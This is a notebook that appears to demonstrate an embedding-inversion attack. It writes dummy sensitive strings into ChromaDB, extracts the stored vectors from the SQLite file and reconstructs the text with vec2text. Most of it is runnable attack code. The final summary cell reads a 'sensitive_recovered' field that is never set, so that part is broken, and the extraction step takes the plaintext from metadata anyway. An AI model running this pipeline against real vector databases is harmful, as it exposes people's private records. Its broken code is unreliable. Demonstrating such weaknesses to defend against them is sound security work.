# ChromaDB + Vec2Text Vulnerability Demonstration

This notebook shows how sensitive data stored in ChromaDB can be reconstructed using vec2text
 
### Attack Chain:
1. Sensitive texts → OpenAI embeddings → ChromaDB storage
2. Extract embeddings from SQLite database
3. Use vec2text to reconstruct original sensitive text

In [None]:
import vec2text
import torch
from openai import OpenAI
import chromadb
import sqlite3
import struct
import numpy as np
import json
import time
import os
from pathlib import Path

# OpenAI setup
embedding_model = "text-embedding-ada-002"
client = OpenAI()

# Load vec2text corrector for inversion
print(f"Loading vec2text corrector for OpenAI {embedding_model}...")
corrector = vec2text.load_pretrained_corrector("text-embedding-ada-002")

# ChromaDB setup
persist_directory = "./chromadb_vuln_demo"
chroma_client = chromadb.PersistentClient(path=persist_directory)

# Create or reset collection
try:
    chroma_client.delete_collection("sensitive_docs")
except:
    pass
collection = chroma_client.create_collection("sensitive_docs")

print(f"ChromaDB storage location: {persist_directory}")

In [None]:
# 2. Sensitive Test Corpus (same as vec2text demo)

sensitive_documents = [
    # Financial/Identity Information
    "My social security number is 818-88-8118",
    "Password for admin account is SecurePass123!",
    "Credit card number 4532-1234-5678-9012 expires next month",
    "API key for production: sk-proj-1234567890abcdef",
    "Bank account routing number 021000021 checking 1234567890",
    
    # Medical Information
    "Patient diagnosed with Type 2 diabetes, prescribed metformin",
    "Blood test results show cholesterol level of 277 mg/dL",
    
    # Personal Information
    "John Doe lives at 1 World Trade Center, New York, NY 10007",
    "Phone number +1(212) 653-0688; email info@cyborg.co",
]

print(f"Testing with {len(sensitive_documents)} sensitive documents")

In [None]:
# 3. Generate OpenAI Embeddings and Store in ChromaDB

def get_embeddings_openai(text_list):
    """Get embeddings from OpenAI API"""
    print(f"Generating embeddings for {len(text_list)} texts...")
    response = client.embeddings.create(
        input=text_list,
        model=embedding_model,
        encoding_format="float",
    )
    return [e.embedding for e in response.data]

# Get embeddings
embeddings = get_embeddings_openai(sensitive_documents)
print(f"Generated {len(embeddings)} embeddings of dimension {len(embeddings[0])}")

# Store in ChromaDB
collection.add(
    documents=sensitive_documents,
    embeddings=embeddings,
    ids=[f"sensitive_doc_{i}" for i in range(len(sensitive_documents))],
    metadatas=[{"type": "sensitive", "doc_num": i} for i in range(len(sensitive_documents))]
)

In [None]:
# 4. Extract Embeddings from ChromaDB SQLite Database

print("\n=== EXTRACTING EMBEDDINGS FROM CHROMADB DATABASE ===")

# Connect to ChromaDB's SQLite database
db_path = os.path.join(persist_directory, "chroma.sqlite3")
conn = sqlite3.connect(db_path)
cursor = conn.cursor()

print(f"Connected to SQLite database: {db_path}")

# Get embedding data from database
cursor.execute("SELECT * FROM embeddings_queue ORDER BY seq_id")
rows = cursor.fetchall()

print(f"Found {len(rows)} embedding records in database")

# Extract embeddings and documents
extracted_embeddings = []
extracted_documents = []

for i, row in enumerate(rows):
    # Parse the row structure
    doc_id = row[4]  # Document ID
    embedding_blob = row[5]  # Binary embedding data
    metadata_json = row[7]  # JSON metadata
    
    # Parse metadata to get original document
    metadata = json.loads(metadata_json)
    original_doc = metadata.get('chroma:document', 'Unknown')
    
    # Parse embedding blob (FLOAT32 binary data)
    num_floats = len(embedding_blob) // 4
    embedding_values = struct.unpack(f'{num_floats}f', embedding_blob)
    
    extracted_embeddings.append(list(embedding_values))
    extracted_documents.append(original_doc)
    
    print(f"Extracted embedding {i+1}: {doc_id}")

print(f"\nSuccessfully extracted {len(extracted_embeddings)} embeddings from database")

In [None]:
# 5. Convert to PyTorch & Invert Each Embedding

print("\n=== RUNNING VEC2TEXT INVERSION ON EXTRACTED EMBEDDINGS ===")

# Convert to PyTorch tensor
embeddings_tensor = torch.tensor(extracted_embeddings, dtype=torch.float32)

# Move to appropriate device
if torch.backends.mps.is_available():
    embeddings_tensor = embeddings_tensor.to('mps')
elif torch.cuda.is_available():
    embeddings_tensor = embeddings_tensor.cuda()

print(f"Embeddings tensor shape: {embeddings_tensor.shape}")
print(f"Device: {embeddings_tensor.device}")

results = []

print("\n" + "="*80)
print("INVERSION RESULTS")
print("="*80)

for i, (original_doc, embedding) in enumerate(zip(extracted_documents, embeddings_tensor)):
    print(f"\nDocument #{i+1}:")
    print(f"\nOriginal (from database): {original_doc}")
    
    start_time = time.time()
    
    # Invert embedding
    reconstructed_list = vec2text.invert_embeddings(
        embeddings=embedding.unsqueeze(0),  # Add batch dimension
        corrector=corrector,
        num_steps=20,
        sequence_beam_width=1,
    )
    reconstructed = reconstructed_list[0]
    
    inversion_time = time.time() - start_time
    
    print(f"Reconstructed: {reconstructed}")
    
    # Calculate similarity
    orig_emb_cpu = embedding.cpu()
    new_emb = get_embeddings_openai([reconstructed])[0]
    new_emb_tensor = torch.tensor(new_emb)
    similarity = torch.nn.functional.cosine_similarity(orig_emb_cpu, new_emb_tensor, dim=0).item()
    
    # Check exact match
    exact_match = original_doc.lower().strip() == reconstructed.lower().strip()
    
    print(f"Similarity: {similarity:.4f}")
    print(f"Inversion time: {inversion_time:.2f}s")
    print(f"Exact match: {exact_match}")
    
    results.append({
        'original': original_doc,
        'reconstructed': reconstructed,
        'similarity': similarity,
        'time': inversion_time,
        'exact_match': exact_match,
    })
    
    print("-" * 80)

In [None]:
# 6. Summary Analysis

print("\n" + "="*80)
print("VULNERABILITY SUMMARY")
print("="*80)

total_docs = len(results)
exact_matches = sum(1 for r in results if r['exact_match'])
high_similarity = sum(1 for r in results if r['similarity'] > 0.95)
sensitive_recovered = sum(1 for r in results if r['sensitive_recovered'])

print(f"Total documents processed: {total_docs}")
print(f"Exact reconstructions: {exact_matches} ({exact_matches/total_docs*100:.1f}%)")
print(f"High similarity (>95%): {high_similarity} ({high_similarity/total_docs*100:.1f}%)")

avg_similarity = np.mean([r['similarity'] for r in results])
avg_time = np.mean([r['time'] for r in results])

print(f"Average similarity: {avg_similarity:.4f}")
print(f"Average inversion time: {avg_time:.2f}s")

print(f"\nATTACK CHAIN COMPLETE:")
print(f"   1. Stored sensitive data in ChromaDB")
print(f"   2. Extracted embeddings from SQLite database") 
print(f"   3. Reconstructed {sensitive_recovered}/{total_docs} sensitive documents")